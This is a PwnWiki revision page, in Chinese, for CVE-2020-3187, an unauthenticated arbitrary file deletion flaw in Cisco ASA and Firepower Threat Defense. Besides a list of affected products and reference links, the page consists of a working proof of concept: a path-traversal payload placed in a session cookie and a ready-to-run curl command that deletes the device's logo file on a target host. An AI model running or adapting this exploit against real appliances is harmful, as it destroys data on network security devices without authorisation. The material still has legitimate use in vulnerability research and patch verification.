Difference between revisions of "Cicso未經驗證任意文件刪除漏洞 CVE-2020-3187"
From PwnWiki
(建立內容為「==影響系統:== Cisco Adaptive Security Appliance <br> Cisco Firepower Threat Defense Software ==POC:== 舉例爲刪除LOGO文件: payload: <br> <code>/+C…」的新頁面) |
(→更多:) |
||
| Line 18: | Line 18: | ||
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/ <br> | https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/ <br> | ||
https://twitter.com/aboul3la/status/1286809567989575685 | https://twitter.com/aboul3la/status/1286809567989575685 | ||
| + | https://github.com/pry0cc/CVE-2020-3187 | ||
| + | https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html | ||
</blockquote> | </blockquote> | ||
Latest revision as of 14:48, 14 April 2021
影響系統:
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
POC:
舉例爲刪除LOGO文件:
payload:
/+CSCOU+/csco_logo.gif
執行:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
更多:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685 https://github.com/pry0cc/CVE-2020-3187 https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
